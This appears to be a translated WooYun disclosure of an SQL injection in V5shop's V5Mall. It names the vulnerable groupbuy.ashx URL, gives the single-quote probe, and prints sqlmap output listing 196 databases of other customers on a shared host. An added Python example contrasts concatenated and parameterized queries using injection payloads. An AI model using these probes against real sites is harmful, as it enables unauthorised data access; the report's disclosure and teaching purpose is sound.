
Vulnerability summary (24 following)

Defect ID: wooyun-2014-047999

Title: SQL injection vulnerability in V5Mall, the multi-user mall product of V5shop

Vendor: V5shop

Author: PgHook

Submitted: 2014-01-06 11:07

Fix time: 2014-04-03 11:08

Published: 2014-04-03 11:08

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org. For questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2014-01-06: Details sent to the vendor; awaiting vendor response
2014-01-11: Vendor actively ignored the vulnerability; details opened to third-party security partners
2014-03-07: Details disclosed to core white hats and domain experts
2014-03-17: Details disclosed to regular white hats
2014-03-27: Details disclosed to intern white hats
2014-04-03: Details disclosed to the public

Brief description:

@V5shop, you shouldn't all be away on a business trip this time, right?

Detailed description:

Test site: http://tdemo002mp.v5portal.com/

[screenshot: v1.jpg]


Vulnerable page: http://tdemo002mp.v5portal.com/member/groupbuy.ashx?id=1
Simply append a single quote (') to the id value:

[screenshot: v2.jpg]


Feed the URL to sqlmap:

[screenshot: v3.jpg]

Proof of vulnerability:

sqlmap database enumeration output. The list includes the SQL Server system databases master, model, msdb and tempdb, so the backend is Microsoft SQL Server, and the database login used by the application can enumerate every database on the shared hosting instance, including other customers' shops, not just this one.

available databases [196]:
[*] 021web.com.cn
[*] baby1_v5shop_com_cn
[*] batteryface.com
[*] book1_v5shop_com_cn
[*] Books
[*] boon365.v5shop.com.cn
[*] chinee.cn
[*] clothes2.v5shop.com.cn
[*] clothes3_v5shop_com_cn
[*] clothes4_v5shop_com_cn
[*] clothes_v5shop_com_cn
[*] common10_v5shop_com_cn
[*] common11_v5shop_com_cn
[*] common12_v5shop_com_cn
[*] common13_com
[*] common14_v5shop
[*] common15.v5shop.com.cn
[*] common16_v5shop_com_cn
[*] common17_v5shop_com_cn
[*] common18.v5shop
[*] common19.v5shop
[*] common20.v5shop.com.cn
[*] common21.v5shop.com.cn
[*] common22.v5shop.com.cn
[*] common23.v5shop.com.cn
[*] common24.v5shop.com.cn
[*] common25.v5shop.com.cn
[*] common28.v5shop.com.cn
[*] common2_v5shop_com_cn
[*] common3_v5shop_com_cn
[*] common4_v5shop_com_cn
[*] common5.v5shop.com.cn
[*] common7_v5shop_com_cn
[*] common8_v5shop_com_cn
[*] common9.v5shop.com.cn
[*] common_v5shop_com_cn
[*] company10.v5shop.com.cn
[*] company11_v5shop_com_cn
[*] company12_v5shop_com_cn
[*] company2.v5shop.com.cn
[*] company3.v5shop.com.cn
[*] company4.v5shop.com.cn
[*] company5_v5shop_com_cn
[*] company7_v5shop_com_cn
[*] company8_v5shop_com_cn
[*] company9.v5shop.com.cn
[*] company_v5shop_com_cn
[*] cuckoomall_com_cn
[*] db6001
[*] db6002
[*] db6003
[*] db6014
[*] db6066
[*] db6067
[*] db6068
[*] db6069
[*] db6070
[*] db6071
[*] db6072
[*] db6073
[*] db6074
[*] demo.v5shop.com.cn
[*] ds201
[*] e-common01.v5shop.com.cn
[*] e-common02.v5shop.com.cn
[*] e-common1
[*] enterprise.v5shop.com.cn
[*] enterprise02v5shop
[*] enterprise04
[*] flower_v5shop_com_cn
[*] hichina.v5shop.com.cn
[*] hsg168v5shop
[*] istation.so
[*] jewelry1_v5shop_com_cn
[*] light1_v5shop_com_cn
[*] liyalisa.com
[*] manyshop
[*] master
[*] mini66v5shop
[*] moban.v5shop.com.cn
[*] model
[*] msdb
[*] multilingual.v5shop.com.cn
[*] ndt360.net
[*] pinyou100.y0543.com
[*] sex_v5shop_com_cn
[*] skin000vs.v5shop.com.cn
[*] skin001vi.v5shop.com.cn
[*] skin002vi.v5shop.com.cn
[*] skin003vi.v5shop.com.cn
[*] skin004vi.v5shop.com.cn
[*] skin005vi.v5shop.com.cn
[*] soft.v5shop.com.cn
[*] soft1.v5shop.net2
[*] taokebao.v5shop.com.cn
[*] taokebao.v5shop.com2
[*] tdemo0010ct.v5shop.com.cn
[*] tdemo001ct.v5shop.com.cn
[*] tdemo002ct.v5shop.com.cn
[*] tdemo002vcc.v5shop.com.cn
[*] tdemo003ct.v5shop.com.cn
[*] tdemo003lj.v5shop.com.cn
[*] tdemo003mp.v5shop.com.cn
[*] tdemo003vcc.v5shop.com.cn
[*] tdemo004ct.v5shop.com.cn
[*] tdemo004mp.v5shop.com.cn
[*] tdemo004vcc.v5shop.com.cn
[*] tdemo005ct.v5shop.com.cn
[*] tdemo005mp.v5shop.com.cn
[*] tdemo005vcc.v5shop.com.cn
[*] tdemo006ct.v5shop.com.cn
[*] tdemo006vj.v5shop.com.cn
[*] tdemo007ct.v5shop.com.cn
[*] tdemo007vcc.v5shop.com.cn
[*] tdemo008ct.v5shop.com.cn
[*] tdemo008vcc.v5shop.com.cn
[*] tdemo009ct.v5shop.com.cn
[*] tdemo009vcc.v5shop.com.cn
[*] tdemo010ct.v5shop.com.cn
[*] tdemo010vca.v5shop.com.cn
[*] tdemo011ct.v5shop.com.cn
[*] tdemo011vca.v5shop.com.cn
[*] tdemo012ct.v5shop.com.cn
[*] tdemo013ct.v5shop.com.cn
[*] tdemo013vcc.v5shop.com.cn
[*] tdemo014ct.v5shop.com.cn
[*] tdemo014vj.v5shop.com.cn
[*] tdemo015ct.v5shop.com.cn
[*] tdemo015vj.v5shop.com.cn
[*] tdemo016vj.v5shop.com.cn
[*] tdemo017vj.v5shop.com.cn
[*] tdemo018vj.v5shop.com.cn
[*] tdemo019vj.v5shop.com.cn
[*] tdemo020vcc.v5shop.com.cn
[*] tdemo021vj.v5shop.com.cn
[*] tdemo022vca.v5shop.com.cn
[*] tdemo023vcc.v5shop.com.cn
[*] tdemo024vca.v5shop.com.cn
[*] tdemo025vca.v5shop.com.cn
[*] tdemo026vcc.v5shop.com.cn
[*] tdemo027vca.v5shop.com.cn
[*] tdemo028vcc.v5shop.com.cn
[*] tdemo029vca.v5shop.com.cn
[*] tdemo030vca.v5shop.com.cn
[*] tdemo031vcc.v5shop.com.cn
[*] tdemo032vcc.v5shop.com.cn
[*] tdemo033vcb.v5shop.com.cn
[*] tdemo034vcc.v5shop.com.cn
[*] tdemo035vcc.v5shop.com.cn
[*] tdemo036vca.v5shop.com.cn
[*] tdemo037vca.v5shop.com.cn
[*] tdemo038vcc.v5shop.com.cn
[*] tdemo039vca.v5shop.com.cn
[*] tdemo040vcc.v5shop.com.cn
[*] tdemo041vj.v5shop.com.cn
[*] tdemo042vj.v5shop.com.cn
[*] tdemo043vcd.v5shop.com.cn
[*] tdemo044vcd.v5shop.com.cn
[*] tdemo045vcd.v5shop.com.cn
[*] tdemo046vcd.v5shop.com.cn
[*] tdemo047vcd.v5shop.com.cn
[*] tdemo048vcd.v5shop.com.cn
[*] tdemo049vca.v5shop.com.cn
[*] tdemo050vj.v5shop.com.cn
[*] tdemo051vcd.v5shop.com.cn
[*] tdemo052vcd.v5shop.com.cn
[*] tdemo053vcd.v5shop.com.cn
[*] tdemo054vcd.v5shop.com.cn
[*] tdemo055vcd.v5shop.com.cn
[*] tdemo056vcd.v5shop.com.cn
[*] tdemo057vcd.v5shop.com.cn
[*] tdemo058vcd.v5shop.com.cn
[*] tdemo059vcd.v5shop.com.cn
[*] tdemo060vcd.v5shop.com.cn
[*] tdemo061vcd.v5shop.com.cn
[*] tdemo062vcd.v5shop.com.cn
[*] tdemo063vcd.v5shop.com.cn
[*] tdemo064vcd.v5shop.com.cn
[*] tdemo065vcd.v5shop.com.cn
[*] tempdb
[*] ultraqua.cn
[*] v5mall.v5shop.com.cn
[*] v5mall02.v5shop.com.cn
[*] v5mall03.v5shop.com.cn
[*] xieyijiao.com
[*] xw188v5shop
[*] xwzbaby_com
[*] yfx.v5shop.com.cn
[*] yqt001.v5shop.com.cn
[*] yqt002.v5shop.com.cn
[*] yqt003.v5shop.com.cn
[*] yqt004.v5shop.com.cn
[*] yqt005.v5shop.com.cn
[*] yqt006.v5shop.com.cn
[*] zhouy.y0543.com
[*] 快乐购商城.com

Fix recommendation:

....
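The report leaves the fix section empty. What follows is an added example, not code from the report or from V5shop: a Python/sqlite3 stand-in for a `?id=` handler that shows side by side the concatenation pattern that explains the behaviour reported above (a lone `'` breaks the statement and surfaces a database error; a boolean tail rewrites the WHERE clause) and the type-checked, parameterized version that closes it. The table, its rows, and the assumption that the real groupbuy.ashx concatenates `id` into its SQL text are all constructed for this example. Since .ashx is an ASP.NET generic handler and the enumerated system databases show a SQL Server backend, the equivalent fix there is `int.TryParse` on the query-string value plus a `SqlCommand` parameter instead of string building; and because one injection point exposed 196 databases including master and msdb, the application's SQL Server login should also be restricted to its own database.

```python
"""Vulnerable vs. parameterized lookup for a `?id=` style handler (added example)."""
import sqlite3

# Constructed sample data standing in for a group-buy table; not V5Mall's schema.
ROWS = [(1, "Winter coat group buy"), (2, "Tea set group buy"), (3, "Phone case group buy")]


def make_db():
    """In-memory sqlite database seeded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE groupbuy (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO groupbuy VALUES (?, ?)", ROWS)
    return conn


def lookup_vulnerable(conn, raw_id):
    """Assumed pattern behind the report: the query-string value is concatenated
    straight into the SQL text. A lone quote leaves an unterminated string (a DB
    error), and a boolean tail such as "1 OR 1=1" changes the WHERE clause."""
    sql = "SELECT id, title FROM groupbuy WHERE id = " + raw_id
    return conn.execute(sql).fetchall()


def lookup_hardened(conn, raw_id):
    """Fix: validate the type at the edge and bind the value as a parameter so the
    database engine never parses attacker-controlled text as SQL."""
    try:
        gid = int(raw_id)
    except ValueError:
        return None  # reject; in a real handler this would be an HTTP 400
    return conn.execute("SELECT id, title FROM groupbuy WHERE id = ?", (gid,)).fetchall()


def probe(raw_id):
    """Run both versions on the same input and return a comparable summary."""
    conn = make_db()
    try:
        vuln = lookup_vulnerable(conn, raw_id)
    except sqlite3.Error as exc:
        vuln = f"DB error: {exc}"  # what the single-quote probe produces
    hard = lookup_hardened(conn, raw_id)
    conn.close()
    return {"input": raw_id, "vulnerable": vuln, "hardened": hard}


if __name__ == "__main__":
    # The same probes a tester would send to groupbuy.ashx?id=...
    for payload in ["1", "1'", "1 OR 1=1", "1 UNION SELECT 0, sqlite_version()"]:
        print(probe(payload))
```

Run it with `python3` and compare the two columns: the concatenated version answers `1'` with a syntax error (the signal the report's second screenshot relies on), returns every row for `1 OR 1=1`, and happily evaluates a UNION, which is the path sqlmap then automates to list databases. The hardened version never reaches the database for any of these because the value fails the integer check first, and even a well-formed integer is bound as data rather than spliced into the statement.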

Copyright notice: please credit the source when reposting: PgHook@WooYun


Vulnerability response

Vendor response:

Severity: No impact, vendor ignored

Ignored on: 2014-04-03 11:08

Vendor reply:

Vulnerability Rank: 11 (WooYun rating)

Latest status:

2014-01-19: Apologies to all the white hats, we did not handle this in time! We have been very busy recently


Vulnerability rating:

Comments

  1. 2014-01-06 11:10 | saline ( Regular white hat | Rank:231 Vulns:32 | Focus On Web Secur1ty)

    mark

  2. 2014-01-06 11:53 | 剑无名 ( Regular white hat | Rank:146 Vulns:32 | This sword has no name.)

    I just don't get it. Why did mine get routed as a small vendor? And there's still one that hasn't been reviewed @疯狗 @xsser

  3. 2014-01-06 11:59 | xsser Certified white hat ( Regular white hat | Rank:254 Vulns:18 | When I look back on everything again, will this world be alright?)

    @剑无名 ... think it over carefully

  4. 2014-01-06 12:07 | 剑无名 ( Regular white hat | Rank:146 Vulns:32 | This sword has no name.)

    @xsser I did think it over. It was confirmed as fixed, and even if it wasn't, nobody had reported the injection in the search box, right? Besides, look at the earlier comments on this site, they all say it was fixed. Admit the mistake and we can all keep playing happily

  5. 2014-01-06 12:08 | xsser Certified white hat ( Regular white hat | Rank:254 Vulns:18 | When I look back on everything again, will this world be alright?)

    @剑无名 ... his is against the generic product, yours is against one of their websites; they don't go in the same bucket

  6. 2014-01-06 12:13 | 剑无名 ( Regular white hat | Rank:146 Vulns:32 | This sword has no name.)

    @xsser My mistake, picking the soap back up.

  7. 2014-01-06 13:32 | k0n9 ( Passerby | Rank:0 Vulns:2 | Following security, following the internet)

    Last time I submitted one where you could get straight into the admin backend with no authentication, and it turned out they had all gone on vacation. This time, have they all gone on a business trip?

  8. 2014-01-06 14:18 | 小驴牙牙 ( Regular white hat | Rank:168 Vulns:43 | Keep learning, keep improving!)

    @剑无名 Sigh, you should have submitted it as a generic one straight away; regretting it now, right!

  9. 2014-01-11 14:30 | PgHook ( Regular white hat | Rank:964 Vulns:115 | ...........................................)

    o(︶︿︶)o Sigh! V5 has gone off on a business trip again. @疯狗, give me a couple of WB to make up for it!